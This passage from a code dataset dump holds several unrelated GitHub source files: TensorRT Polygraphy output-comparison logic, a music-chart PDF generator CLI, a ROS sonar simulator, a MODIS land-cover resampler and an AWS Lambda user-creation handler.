values in the array to prevent NaN in relative error.\n cast_up_out1 = comp_util.cast_up(out1)\n\n if np.issubdtype(cast_up_out1.dtype, np.floating):\n if np.any(cast_up_out1 == 0):\n G_LOGGER.warning(\n f\"{runner1_name:35} | Output: {out1_name}: Some values are 0. \"\n f\"Will add a small epsilon quantity to these when computing relative difference. \"\n f\"Note that this may cause some relative differences to be extremely high. \",\n mode=LogMode.ONCE,\n )\n cast_up_out1[cast_up_out1 == 0] += np.finfo(float).eps\n\n reldiff = absdiff / np.abs(cast_up_out1)\n min_reldiff = comp_util.compute_min(reldiff)\n max_reldiff = comp_util.compute_max(reldiff)\n mean_reldiff = comp_util.compute_mean(reldiff)\n median_reldiff = comp_util.compute_median(reldiff)\n\n min_absdiff = comp_util.compute_min(absdiff)\n max_absdiff = comp_util.compute_max(absdiff)\n mean_absdiff = comp_util.compute_mean(absdiff)\n median_absdiff = comp_util.compute_median(absdiff)\n\n def stat_failed(diff, tol):\n return np.isnan(diff) or diff > tol\n\n if per_out_err_stat == \"mean\":\n failed = stat_failed(mean_absdiff, per_out_atol) and stat_failed(mean_reldiff, per_out_rtol)\n elif per_out_err_stat == \"median\":\n failed = stat_failed(median_absdiff, per_out_atol) and stat_failed(median_reldiff, per_out_rtol)\n elif per_out_err_stat == \"max\":\n failed = stat_failed(max_absdiff, per_out_atol) and stat_failed(max_reldiff, per_out_rtol)\n else:\n assert (\n per_out_err_stat == \"elemwise\"\n ), \"This branch should be unreachable unless per_out_err_stat is 'elemwise'\"\n with np.testing.suppress_warnings() as sup:\n sup.filter(RuntimeWarning)\n mismatches = ((absdiff > per_out_atol) | np.isnan(absdiff)) & (\n (reldiff > per_out_rtol) | np.isnan(reldiff)\n )\n\n failed = np.any(mismatches)\n try:\n with G_LOGGER.indent():\n G_LOGGER.super_verbose(f\"Mismatched indices:\\n{np.argwhere(mismatches)}\")\n G_LOGGER.extra_verbose(f\"{runner0_name:35} | Mismatched values:\\n{out0[mismatches]}\")\n G_LOGGER.extra_verbose(f\"{runner1_name:35} | Mismatched values:\\n{out1[mismatches]}\")\n except Exception as err:\n G_LOGGER.warning(f\"Failing to log mismatches.\\nNote: Error was: {err}\")\n\n # Log information about the outputs\n hist_bin_range = (\n min(comp_util.compute_min(out0), comp_util.compute_min(out1)),\n max(comp_util.compute_max(out0), comp_util.compute_max(out1)),\n )\n comp_util.log_output_stats(out0, failed, f\"{runner0_name}: {out0_name}\", hist_range=hist_bin_range)\n comp_util.log_output_stats(out1, failed, f\"{runner1_name}: {out1_name}\", hist_range=hist_bin_range)\n\n G_LOGGER.info(f\"Error Metrics: {out0_name}\")\n with G_LOGGER.indent():\n\n def req_tol(mean_diff, median_diff, max_diff):\n return {\n \"mean\": mean_diff,\n \"median\": median_diff,\n \"max\": max_diff,\n \"elemwise\": max_diff,\n }[per_out_err_stat]\n\n msg = f\"Minimum Required Tolerance: {per_out_err_stat} error | [abs={req_tol(mean_absdiff, median_absdiff, max_absdiff):.5g}] OR [rel={req_tol(mean_reldiff, median_reldiff, max_reldiff):.5g}]\"\n if per_out_err_stat == \"elemwise\":\n msg += \" (requirements may be lower if both abs/rel tolerances are set)\"\n G_LOGGER.info(msg)\n\n if save_error_metrics_plot or show_error_metrics_plot:\n with G_LOGGER.indent():\n comp_util.scatter_plot_error_magnitude(\n absdiff,\n reldiff,\n comp_util.cast_up(out1),\n min_reldiff,\n max_reldiff,\n runner0_name,\n runner1_name,\n out0_name,\n out1_name,\n save_dir=save_error_metrics_plot,\n show=show_error_metrics_plot,\n )\n\n def build_heatmaps(diff, min_diff, max_diff, prefix, use_lognorm=None):\n if save_heatmaps or show_heatmaps:\n with G_LOGGER.indent():\n comp_util.build_heatmaps(\n diff,\n min_diff,\n max_diff,\n prefix=f\"{prefix} Error | {out0_name}\",\n save_dir=save_heatmaps,\n show=show_heatmaps,\n use_lognorm=use_lognorm,\n )\n\n comp_util.log_output_stats(absdiff, failed, \"Absolute Difference\")\n build_heatmaps(absdiff, min_absdiff, max_absdiff, \"Absolute\")\n\n comp_util.log_output_stats(reldiff, failed, \"Relative Difference\")\n build_heatmaps(reldiff, min_reldiff, max_reldiff, \"Relative\", use_lognorm=True)\n\n G_LOGGER.extra_verbose(\n f\"Finished comparing: '{out0_name}' (dtype={out0.dtype}, shape={out0.shape}) [{runner0_name}] and '{out1_name}' (dtype={out1.dtype}, shape={out1.shape}) [{runner1_name}]\"\n )\n return OutputCompareResult(\n not failed, max_absdiff, max_reldiff, mean_absdiff, mean_reldiff, median_absdiff, median_reldiff\n )\n\n def compare_output(iter_result0, iter_result1):\n \"\"\"\n Compare the outputs of two runners from a single iteration.\n\n This function will always iterate over the output names of the first IterationResult,\n and attempt to find corresponding output names in the second.\n If no corresponding output name is found, the output is skipped.\n If all output names are skipped, then this function raises an error.\n\n Args:\n iter_result0 (IterationResult): The result of the first runner.\n iter_result1 (IterationResult): The result of the second runner.\n\n Returns:\n OrderedDict[str, OutputCompareResult]:\n The name of the outputs compared, derived from the first IterationResult,\n and whether they matched. If an output name is not found, it is omitted from this dictionary.\n\n Raises:\n PolygraphyException: If all output names are skipped, and thus no outputs are compared.\n \"\"\"\n\n def check_dict(dct, dict_name):\n if isinstance(dct, dict):\n util.check_sequence_contains(\n dct.keys(),\n set(iter_result0.keys()) | set(iter_result1.keys()) | {\"\"},\n name=dict_name,\n log_func=G_LOGGER.warning,\n check_missing=False,\n )\n\n check_dict(rtol, \"the rtol dictionary\")\n check_dict(atol, \"the atol dictionary\")\n check_dict(check_error_stat, \"the check_error_stat dictionary\")\n\n if not check_shapes:\n G_LOGGER.info(\"Strict shape checking disabled. Will attempt to match output shapes before comparisons\")\n\n def match(out0_name, output0, out1_name, output1):\n per_out_atol = util.value_or_from_dict(atol, out0_name, default_atol)\n per_out_rtol = util.value_or_from_dict(rtol, out0_name, default_rtol)\n per_out_err_stat = util.value_or_from_dict(check_error_stat, out0_name, default_error_stat)\n\n G_LOGGER.info(\n f\"Tolerance: [abs={per_out_atol:.5g}, rel={per_out_rtol:.5g}] | Checking {per_out_err_stat} error\"\n )\n G_LOGGER.extra_verbose(f\"Note: Comparing {iter_result0.runner_name} vs. {iter_result1.runner_name}\")\n\n if check_shapes and output0.shape != output1.shape:\n G_LOGGER.error(\n f\"Will not compare outputs of different shapes. Note: Output shapes are {output0.shape} and {output1.shape}.\"\n )\n G_LOGGER.error(\n \"Note: Use --no-shape-check or set check_shapes=False to \" \"attempt to compare values anyway.\",\n mode=LogMode.ONCE,\n )\n outputs_matched = False\n else:\n output1 = util.try_match_shape(output1, output0.shape)\n output0 = output0.reshape(output1.shape)\n outputs_matched = check_outputs_match(\n output0,\n out0_name,\n output1,\n out1_name,\n per_out_rtol=per_out_rtol,\n per_out_atol=per_out_atol,\n per_out_err_stat=per_out_err_stat,\n runner0_name=iter_result0.runner_name,\n runner1_name=iter_result1.runner_name,\n )\n\n # Finally show summary.\n if not outputs_matched:\n G_LOGGER.error(\n f\"FAILED | Output: '{out0_name}' | Difference exceeds tolerance (rel={per_out_rtol}, abs={per_out_atol})\"\n )\n else:\n G_LOGGER.finish(\n f\"PASSED | Output: '{out0_name}' | Difference is within tolerance (rel={per_out_rtol}, abs={per_out_atol})\"\n )\n\n return outputs_matched\n\n nonlocal find_output_func\n find_output_func = util.default(\n find_output_func, functools.partial(default_find_output_func, base_iter_result=iter_result0)\n )\n return run_comparison(match, fail_fast, iter_result0, iter_result1, find_output_func)\n\n return compare_output\n\n @staticmethod\n def indices(index_tolerance=None, fail_fast=None):\n \"\"\"\n Creates a function that compares two IterationResults containing indices, and can be used as the `compare_func` argument\n in ``Comparator.compare_accuracy``. This can be useful to compare, for example, the outputs of a Top-K operation.\n\n Outputs with more than one dimension are treated like multiple batches of values. For example, an output of shape (3, 4, 5, 10)\n would be treated like 60 batches (3 x 4 x 5) of 10 values each.\n\n Args:\n index_tolerance (Union[int, Dict[str, int]]):\n The tolerance to use when comparing indices. This is an integer indicating the maximum distance\n between values before it is considered a mismatch. For example, consider two outputs:\n ::\n\n output0 = [0, 1, 2]\n output1 = [1, 0, 2]\n\n With an index tolerance of 0, this would be considered a mismatch, since the positions of `0` and `1`\n are flipped between the two outputs. However, with an index tolerance of 1, it would pass since\n the mismatched values are only 1 spot apart. If instead the outputs were:\n ::\n\n output0 = [0, 1, 2]\n output1 = [1, 2, 0]\n\n Then we would require an index tolerance of 2, since the `0` value in the two outputs is 2 spots apart.\n\n When this value is set, the final 'index_tolerance' number of values are ignored for each batch.\n For example, with an index tolerance of 1, mismatches in the final element are not considered.\n If used with a Top-K output, you can compensate for this by instead using a Top-(K + index_tolerance).\n\n This can be provided on a per-output basis using a dictionary. In that case,\n use an empty string (\"\") as the key to specify default tolerance for outputs not explicitly listed.\n\n fail_fast (bool):\n Whether the function should exit immediately after the first failure.\n Defaults to False.\n\n\n Returns:\n Callable(IterationResult, IterationResult) -> OrderedDict[str, bool]:\n A callable that returns a mapping of output names to `bool` s, indicating\n whether the corresponding output matched.\n\n \"\"\"\n index_tolerance = util.default(index_tolerance, 0)\n fail_fast = util.default(fail_fast, False)\n\n def compare_output(iter_result0, iter_result1):\n \"\"\"\n Compare the outputs of two runners from a single iteration.\n\n This function will always iterate over the output names of the first IterationResult,\n and attempt to find corresponding output names in the second.\n If no corresponding output name is found, the output is skipped.\n If all output names are skipped, then this function raises an error.\n\n Args:\n iter_result0 (IterationResult): The result of the first runner.\n iter_result1 (IterationResult): The result of the second runner.\n\n Returns:\n OrderedDict[str, bool]:\n The name of the outputs compared, derived from the first IterationResult,\n and whether they matched. If an output name is not found, it is omitted from this dictionary.\n\n Raises:\n PolygraphyException: If all output names are skipped, and thus no outputs are compared.\n \"\"\"\n\n def match(out0_name, output0, out1_name, output1):\n per_out_index_tol = util.value_or_from_dict(index_tolerance, out0_name, 0)\n\n if output0.shape != output1.shape:\n G_LOGGER.error(\"Cannot compare outputs of different shapes.\")\n return False\n\n passed = True\n for batch in np.ndindex(output0.shape[:-1]):\n out0_vals = output0[batch]\n if per_out_index_tol > 0:\n out0_vals = out0_vals[:-per_out_index_tol]\n out1_vals = output1[batch]\n\n for index0, val0 in enumerate(out0_vals):\n if val0 == out1_vals[index0]:\n continue\n\n index1 = np.argwhere(out1_vals == val0).ravel()\n if index1.size < 1:\n G_LOGGER.error(f\"FAILED | Value: {val0} not found in output\")\n passed = False\n if fail_fast:\n return False\n continue\n\n index1 = index1[0]\n\n if abs(index1 - index0) > per_out_index_tol:\n G_LOGGER.error(f\"FAILED | Difference exceeds index tolerance ({per_out_index_tol})\")\n passed = False\n if fail_fast:\n return False\n continue\n\n # Log information about the outputs\n hist_bin_range = (\n min(comp_util.compute_min(output0), comp_util.compute_min(output1)),\n max(comp_util.compute_max(output0), comp_util.compute_max(output1)),\n )\n comp_util.log_output_stats(\n output0, not passed, f\"{iter_result0.runner_name}: {out0_name}\", hist_range=hist_bin_range\n )\n comp_util.log_output_stats(\n output1, not passed, f\"{iter_result1.runner_name}: {out1_name}\", hist_range=hist_bin_range\n )\n\n if passed:\n G_LOGGER.finish(f\"PASSED | Difference is within index tolerance ({per_out_index_tol})\")\n return passed\n\n return run_comparison(\n match,\n fail_fast,\n iter_result0,\n iter_result1,\n functools.partial(default_find_output_func, base_iter_result=iter_result0),\n )\n\n return compare_output\n","repo_name":"NVIDIA/TensorRT","sub_path":"tools/Polygraphy/polygraphy/comparator/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":30309,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"3373871949","text":"#!/usr/bin/env python3\n\n\"\"\"\nTake in a music chart in raw text form.\nOutput 13 PDF's:\n- One in the Nashville Number System\n- One in each of the lettered keys\n\nDependencies:\n- pylatex package\n\"\"\"\n\nimport argparse\nimport os\nimport re\nimport signal\nimport sys\n\nfrom musiccharts import __version__\nfrom musiccharts import data_definitions as vars\nfrom musiccharts.data_processing import (format_line, process_document,\n validate_keys)\nfrom musiccharts.read_file import read_file_contents\n\n\ndef main():\n \"\"\"Execute main function.\"\"\"\n\n # ArgParse setup\n formatter_class = argparse.RawDescriptionHelpFormatter\n description = \"Description...\"\n epilog = f\"Version: {__version__}\\n \"\n parser = argparse.ArgumentParser(\n formatter_class=formatter_class, description=description, epilog=epilog\n )\n parser.add_argument(\"input\", nargs=\"*\", help=\"Input file\")\n parser.add_argument(\n \"-k\",\n \"--key\",\n default=\"NNS,Ab,A,Bb,B,C,Db,D,Eb,E,F,Gb,G\",\n dest=\"keys\",\n help='Desired keys, default is \"NNS,Ab,A,Bb,B,C,Db,D,Eb,E,F,Gb,G\"',\n metavar=\"\",\n type=str,\n )\n parser.add_argument(\n \"-n\",\n \"--name\",\n dest=\"dest_filename\",\n help=\"Destination filename\",\n metavar=\"\",\n type=str,\n )\n parser.add_argument(\n \"-s\",\n \"--size\",\n default=vars.BASE_FONT_SIZE,\n choices=vars.ALL_FONT_SIZES,\n dest=\"font_size\",\n help=f\"Available font sizes: {vars.ALL_FONT_SIZES}\",\n metavar=\"\",\n type=float,\n )\n parser.add_argument(\n \"--tex\",\n dest=\"keep_tex\",\n action=\"store_false\",\n help=\"Output LaTeX file in addition to PDFs\",\n )\n args = parser.parse_args()\n if len(args.input) > 1:\n print(\"\\nError: more than one source file provided for processing!\\n\")\n sys.exit(1)\n elif len(args.input) < 1:\n parser.print_help()\n sys.exit(1)\n else:\n src_filename = args.input[0]\n\n # Process provided filename\n file_contents = read_file_contents(filename=src_filename)\n\n if args.dest_filename:\n dest_filename = args.dest_filename\n else:\n dest_filename = re.sub(r\"(.*/)*([^.]*)(\\..*)\", r\"\\2\", src_filename)\n\n # Save and validate user-provided keys\n keys = args.keys.split(\",\")\n validate_keys(keys)\n\n # Process formatting for each individual line of text\n for key in keys:\n formatted_lines = []\n chord_errors = []\n i = 0\n next_line_after_intro = False\n for line in file_contents:\n results = format_line(\n line=line,\n line_num=i,\n key=key,\n next_line_after_intro=next_line_after_intro,\n debug=False,\n )\n next_line_after_intro = results.get(\"next_line_after_intro\")\n formatted_lines.append(results.get(\"edits\"))\n chord_errors.extend(results.get(\"errors\"))\n i += 1\n\n # Display specific invalid chord errors\n if len(chord_errors) > 0:\n print(\"\\nError: invalid chord syntax found\")\n print(\"----------------------------------\")\n for match in chord_errors:\n print(\n f\"Line {str(match.get('line_num')).ljust(3)}: {match.get('chord')}\"\n )\n print(\"\")\n sys.exit(1)\n\n # Create the document\n process_document(\n dest_filename=f\"{dest_filename} ({key})\",\n path=os.getcwd(),\n file_contents=formatted_lines,\n font_size=args.font_size,\n keep_tex=args.keep_tex,\n )\n\n\n# Call main function\nif __name__ == \"__main__\":\n main()\n","repo_name":"jwcorell/musiccharts","sub_path":"musiccharts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20509621135","text":"#!/usr/bin/env python\n\n\n'''\n This script will simulate a forward looking imaging sonar using a gazebo lidar\n'''\n\n# Following line changes the order in which Python checks for packages\nimport os\nimport sys\nimport rospy\nimport numpy as np\nimport math\nimport rospkg\nimport tf.transformations as trans\nimport scipy.misc\nimport cv2\nimport copy\nfrom sensor_msgs.msg import LaserScan, Image\nfrom std_msgs.msg import Float32MultiArray\nfrom nav_msgs.msg import Odometry\nfrom collections import deque\nfrom cv_bridge import CvBridge\nfrom scipy import interpolate\nfrom scipy.spatial.transform import Rotation as R\nimport torch\n\nclass GT():\n SEAFLOOR = [0, 255, 0]\n PIPE = [255, 0, 0]\n UNKNOWN = [0, 0, 0]\n DEBRIS = [0, 0, 255]\n\nclass ForwardImagingSonar(object):\n def __init__(self):\n np.set_printoptions(suppress=True)\n # Get RosParams\n self.namespace = rospy.get_namespace().replace('/', '')\n self.z_scale = int(rospy.get_param('~z_scale', 2))\n self.beam_width = float(rospy.get_param('~beam_width', 1.5708))\n self.sonar_noise = float(rospy.get_param('~sonar_noise', 25))\n self.fis_bins = int(rospy.get_param('~fis_bins', 360))\n # Compared to 15m altitude -> Ideal scan altitude\n self.nominal_alt = int(rospy.get_param('~nominal_alt', 15))\n self.laser_topic = rospy.get_param('~laser_topic', \"\")\n print(\"[ VU FIS ] laser topic: \", self.laser_topic)\n self.uuv_rpy = None\n self.uuv_position = [0,0,0]\n self.delta_source = None\n self.d_trans = [0,0,0]\n self.d_rot = [0,0,0]\n self.fis_scan = []\n self.fis_gt_scan = []\n self.pcl_size = 250\n self.pcl_dq = deque(maxlen=self.pcl_size)\n rp = rospkg.RosPack()\n filename = rp.get_path(\"vandy_bluerov\") + \"/nodes/sonars/fis_mask.png\"\n self.sonar_mask = cv2.imread(filename, 0) \n \n\n # Initialize subscribers/publishers\n self.fis_scan_pub = rospy.Publisher(\n '/vu_fis/scan', Image, queue_size=1)\n \n self.fis_scan_gt_pub = rospy.Publisher(\n '/vu_fis/scan_gt', Image, queue_size=1)\n\n self.cvbridge = CvBridge()\n self.odometry_sub = rospy.Subscriber(\n '/uuv0/pose_gt_noisy_ned', Odometry, self.callback_odometry, queue_size=1) \n \n if self.laser_topic == '/scan':\n self.sub = rospy.Subscriber(\n \"/scan\", LaserScan, self.rplidar_callback, queue_size=1) \n else:\n self.sub = rospy.Subscriber(\n \"vu_fis\", LaserScan, self.laser_callback, queue_size=1)\n \n rate = rospy.Rate(1)\n while not rospy.is_shutdown():\n if len(self.fis_scan) > 0:\n # Create scan and gt image message and publish them\n msg, msg_gt = self.create_cvimage(self.fis_scan, sonar_noise=self.sonar_noise)\n msg.header.frame_id = \"fis\"\n self.fis_scan_pub.publish(msg)\n\n msg_gt.header.frame_id = \"fis\"\n self.fis_scan_gt_pub.publish(msg_gt)\n \n rate.sleep()\n\n def rplidar_callback(self, msg):\n '''\n This method handles input from real HW (RPLidar) to create FIS\n '''\n # RpLidar defaults:\n # current scan mode: Sensitivity, sample rate: 8 Khz, max_distance: 12.0 m, scan frequency:10.0 Hz, \n\n # Transform rays to height scan line\n ranges = np.array(msg.ranges) \n # print(np.ma.masked_invalid(abs(ranges)).mean()) \n ranges *= 40 # self.nominal_alt / np.ma.masked_invalid(abs(ranges)).mean()\n scan = self.transform_scan(ranges[405:765], self.fis_bins)\n self.transform_pcl()\n self.pcl_dq.append(scan)\n self.fis_scan = self.pcl_to_image(self.pcl_dq)\n self.fis_gt_scan = self.pcl_to_image(self.pcl_dq, gt=True)\n \n def laser_callback(self, msg):\n '''\n This method handles input from Gazebo (simulated FIS)\n '''\n # Transform rays to height scan line\n # print(\"laser_callback\")\n scan = self.transform_scan(np.array(msg.ranges), self.fis_bins)\n \n self.transform_pcl()\n self.pcl_dq.append(scan)\n self.fis_scan = self.pcl_to_image(self.pcl_dq)\n self.fis_gt_scan = self.pcl_to_image(self.pcl_dq, gt=True)\n \n def transform_pcl(self):\n if self.delta_source is not None:\n self.d_trans = np.array(self.uuv_position) - np.array(self.delta_source[0])\n self.d_rot = np.array(self.uuv_rpy) - np.array(self.delta_source[1])\n # Ignore d_roll\n # self.d_rot[0] = 0\n # Ignore d_pitch\n # self.d_rot[1] = 0\n # Calculate fwd movement\n d_fwd_trans = math.sqrt(2*self.d_trans[0]**2)\n self.delta_source = [self.uuv_position, self.uuv_rpy]\n \n \n if len(self.pcl_dq) > 0:\n for i in range(len(self.pcl_dq)):\n # apply translation\n self.pcl_dq[i][:] -= [0, d_fwd_trans, -self.d_trans[2]]\n # apply Yaw rotation\n r = R.from_euler('zxy', self.d_rot, degrees=False)\n self.pcl_dq[i][:] = r.apply(self.pcl_dq[i][:]) \n \n def pcl_to_image(self, pcl, img_size=(240, 240), gt=False):\n img=np.full(img_size, -np.inf)\n scale = 7\n offset = 80\n for points in pcl:\n for point in points:\n # print(point)\n coord = tuple((\n int(img_size[0] - point[1]*scale - offset), \n int(point[0]*scale + img_size[1]//2) \n )) \n if self.check_valid_coord(coord, img_size):\n if not gt:\n img[coord] = 255 - point[2]*10\n else:\n img[coord] = point[2]\n return img\n \n \n def check_valid_coord(self, coord, img_size):\n if 0 <= coord[0] < img_size[0] and 0 <= coord[1] < img_size[1]:\n return True\n return False\n\n def create_cvimage(self, img, sonar_noise=25):\n # ratio = 1/((np.nanmax(img[img != np.inf]) - np.nanmin(img[img != -np.inf]))/255)\n # img -= np.nanmin(img[img != -np.inf])\n # print(\"*** \"+str(ratio)+\" *** \"+str(np.nanmin(img[img != -np.inf])))\n\n ratio = 7\n img -= 400\n img *= ratio * 0.75\n img[img != -np.inf] = 32+255-img[img != -np.inf]\n\n # Closing\n kernel = np.ones((5,1),np.uint8)\n img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n #Passing for gt\n raw_scan = copy.deepcopy(img)\n # raw_scan[img == -np.inf] = np.nanmin(img[img != -np.inf])\n gt_img = self.create_gt_cvimage(raw_scan)\n\n # adding noise\n noise = np.random.normal(0, sonar_noise, np.shape(img))\n img[img>0] += noise[img>0]\n\n img[img>255]=255\n img[img<0]=0\n\n # Disortion for making radial blur\n pts1 = np.float32([[50,0],[189,0],[0,239],[239,239]])\n pts2 = np.float32([[0,0],[239,0],[0,239],[239,239]])\n M = cv2.getPerspectiveTransform(pts2,pts1)\n img = cv2.warpPerspective(img,M,(240,240))\n\n # sonar noise, motion/radial blur\n size = 9\n kernel_motion_blur = np.zeros((size, size))\n kernel_motion_blur[:, int((size-1)/2)] = np.ones(size)\n kernel_motion_blur = kernel_motion_blur / size\n \n # applying the kernel to the input image\n img = cv2.filter2D(img, -1, kernel_motion_blur)\n \n # reverting disortion\n M = cv2.getPerspectiveTransform(pts1,pts2)\n img = cv2.warpPerspective(img,M,(240,240))\n \n img[img>255]=255\n img[img<0]=0\n\n # apply masks\n img = cv2.bitwise_and(img, img, mask=self.sonar_mask) \n gt_img = cv2.bitwise_and(gt_img, gt_img, mask=self.sonar_mask) \n\n return self.cvbridge.cv2_to_imgmsg(img.astype(np.uint8), encoding=\"mono8\"), self.cvbridge.cv2_to_imgmsg(gt_img.astype(np.uint8), encoding=\"rgb8\")\n \n\n def create_gt_cvimage(self, img):\n # Color GT Scan \n img[img>255]=255\n img[img<0]=0\n mean_val = np.nanmean(img[img != -np.inf])//1\n\n # Calculated GT\n gt_img = np.zeros((np.shape(img)[0], np.shape(img)[1], 3))\n threshold_g = cv2.adaptiveThreshold(cv2.GaussianBlur(img.astype(np.uint8),(5,5),0),255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,55,0)\n\n # Define lower/upper value\n lower = mean_val - 10\n upper = 255\n\n # Check the region of the image actually with a color in the range defined below\n # inRange returns a matrix in black and white\n # threshold_g = cv2.inRange(img, lower, upper)\n\n # img = np.where(threshold_g <= 0, -3000, img) # Unknown BLACK\n img_t = copy.deepcopy(img)\n # img[img!=] = -3000\n try:\n img_t[threshold_g == 0] = mean_val\n except ValueError: \n pass\n blur = cv2.GaussianBlur(img_t.astype(np.uint8),(5,5),0)\n _,threshold = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n img = np.where(threshold > 0, -1000, img)\n img = np.where(threshold <= 0, 0, img)\n img[threshold_g == 0] = -3000\n \n\n # img = np.where(threshold > 0, -2000, img) # Debris/Unknown BLUE\n # img = np.where(np.logical_and(img > self.nominal_alt , img <= self.nominal_alt+50), -1000, img) # Pipeline RED\n # img = np.where(img > mean_val-100, 0, img) # Seabed GREEN\n\n gt_img[np.array(img) == 0] = GT.SEAFLOOR\n gt_img[np.array(img) == -1000] = GT.PIPE\n gt_img[np.array(img) == -2000] = GT.PIPE #GT.DEBRIS\n gt_img[np.array(img) < -2000] = GT.UNKNOWN\n\n # Denoise/Close\n kernel = np.ones((5,1),np.uint8)\n gt_img = cv2.morphologyEx(gt_img, cv2.MORPH_CLOSE, kernel)\n\n # Return RGB image\n return gt_img\n\n def transform_scan(self, rays, fis_width): \n # using GT depth\n # nominal_alt = 60 - self.uuv_position[2] # Nominal sea depth - GT depth\n nominal_alt = self.nominal_alt \n vertical_offset_angle = -self.beam_width/2\n ray_step_angle = self.beam_width / fis_width\n pcl = [] \n\n for step in range(fis_width): \n # Project rays to the reference flat seafloor\n if self.uuv_rpy is not None:\n roll_compensation = self.uuv_rpy[0]\n pitch_compensation = self.uuv_rpy[1] \n else:\n roll_compensation = 0\n pitch_compensation = 0\n \n scan_alpha = ((step + 0.5) * ray_step_angle + vertical_offset_angle) \n sonar_pitch = math.radians(-45)\n \n # information from movement\n delta_rot = [0,0,0]\n delta_trans = [0,0,0]\n\n # [y p r]\n rot = [ \n scan_alpha,\n sonar_pitch + pitch_compensation,\n roll_compensation\n ]\n\n echo = [0, rays[step], 0]\n\n if np.isfinite(rays[step]):\n r = R.from_euler('zxy', rot, degrees=False)\n point = r.apply(echo)\n pcl.append(point)\n # print(str(math.degrees(scan_alpha)) + \" \" + str(point))\n return np.array(pcl)\n\n def callback_odometry(self, msg): \n pos = [msg.pose.pose.position.x,\n msg.pose.pose.position.y,\n msg.pose.pose.position.z]\n\n quat = [msg.pose.pose.orientation.x,\n msg.pose.pose.orientation.y,\n msg.pose.pose.orientation.z,\n msg.pose.pose.orientation.w]\n\n # Calculate the position, position, and time of message\n p = self.vector_to_np(msg.pose.pose.position)\n self.uuv_position = p\n\n q = self.quaternion_to_np(msg.pose.pose.orientation)\n uuv_rpy = trans.euler_from_quaternion(q, axes='sxyz')\n self.uuv_rpy = uuv_rpy \n \n def vector_to_np(self, v):\n return np.array([v.x, v.y, v.z])\n \n def quaternion_to_np(self, q):\n return np.array([q.x, q.y, q.z, q.w])\n\n \n\nif __name__ == \"__main__\":\n rospy.init_node(\"FIS_Waterfall\")\n fis = ForwardImagingSonar()\n rospy.spin()\n","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/nodes/sonars/forward_imaging_sonar.py","file_name":"forward_imaging_sonar.py","file_ext":"py","file_size_in_byte":12377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5426237042","text":"import os\nimport numpy\nfrom scipy import stats\nimport matplotlib.pyplot as plt\n\nws = os.getcwd()\n\nMCD12Q1_006_1KM = os.path.join(ws, 'MCD12Q1.006.LC.CEReS_H8AHI.01km.MEAN.NA.ann.bsq.byt')\nMCD12Q1_006_10KM_npy = os.path.join(ws, 'MCD12Q1_006_10km.npy')\n\nROI_DISTANCE = 0.1\n\nif __name__ == \"__main__\":\n roi_lats = numpy.arange(60. - ROI_DISTANCE / 2, -60, -ROI_DISTANCE)\n roi_lons = numpy.arange(85. + ROI_DISTANCE / 2, 205, ROI_DISTANCE)\n\n modis_lc_10km = numpy.zeros((len(roi_lats), len(roi_lons)))\n size = int(1/ROI_DISTANCE)\n\n with open(MCD12Q1_006_1KM, 'rb') as fp:\n landcover = numpy.frombuffer(fp.read(), dtype='uint8').reshape(12000, 12000)\n lat_roi_idx = 0\n for lat_idx in range(len(roi_lats)):\n print(lat_idx, '/', len(roi_lats))\n lon_roi_idx = 0\n for lon_idx in range(len(roi_lons)):\n lc_2d = landcover[lat_roi_idx*size:(lat_roi_idx+1)*size, lon_roi_idx*size:(lon_roi_idx+1)*size]\n # print(lat_roi_idx*size, (lat_roi_idx+1)*size, lon_roi_idx*size, (lon_roi_idx+1)*size)\n # print(lc_2d)\n lc_1d = lc_2d.flatten()\n lc_mode = stats.mode(lc_1d)[0]\n modis_lc_10km[lat_idx][lon_idx] = lc_mode\n lon_roi_idx += 1\n lat_roi_idx += 1\n numpy.save(MCD12Q1_006_10KM_npy, modis_lc_10km)\n plt.imshow(modis_lc_10km)\n plt.show()\n","repo_name":"Bosh0113/MISR_AHI","sub_path":"Data_Screening/statistics/preprocess/0_MCD12Q1_6_to10KM.py","file_name":"0_MCD12Q1_6_to10KM.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38621232428","text":"import boto3\nimport json\nfrom uuid import uuid4\nimport time\nfrom boto3.dynamodb.conditions import Key\n\n\ndef create_user(event, context):\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('userTable')\n \n request_body = json.loads(event['body'])\n \n username = request_body['userName']\n response = table.query(\n KeyConditionExpression=Key('userName').eq(username))\n print(response)\n \n if len(response[\"Items\"]) > 0:\n return {\n 'statusCode': 409,\n 'body': json.dumps({'error': 'Username already exists'})\n }\n \n user_id = str(uuid4())\n \n try:\n user = {\n 'userId': user_id,\n 'activateUser': request_body['activateUser'],\n 'createdAt': str(int(time.time() * 1000)),\n 'currency': request_body['currency'],\n 'lastName': request_body['lastName'],\n 'email': request_body['email'],\n 'firstName': request_body['firstName'],\n 'phone': request_body['phone'],\n 'role': request_body['role'],\n 'userName': username\n }\n table.put_item(Item=user)\n except Exception as e:\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error': str(e)})\n }\n \n response_payload = {\n 'userId': user_id,\n 'activateUser': user['activateUser'],\n 'createdAt': user['createdAt'],\n 'currency': user['currency'],\n 'lastName': user['lastName'],\n 'email': user['email'],\n 'firstName': user['firstName'],\n 'phone': user['phone'],\n 'role': user['role'],\n 'id': user['userId']\n }\n \n response = {\n 'statusCode': 201,\n 'body': json.dumps(response_payload)\n }\n \n return response\n","repo_name":"Adeakim/tinkoko_marketplace","sub_path":"create_user.py","file_name":"create_user.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73414313129","text":"import logging\n\nfrom ckan.lib.helpers import url_for\n\nfrom ckanext.dcat.profiles import 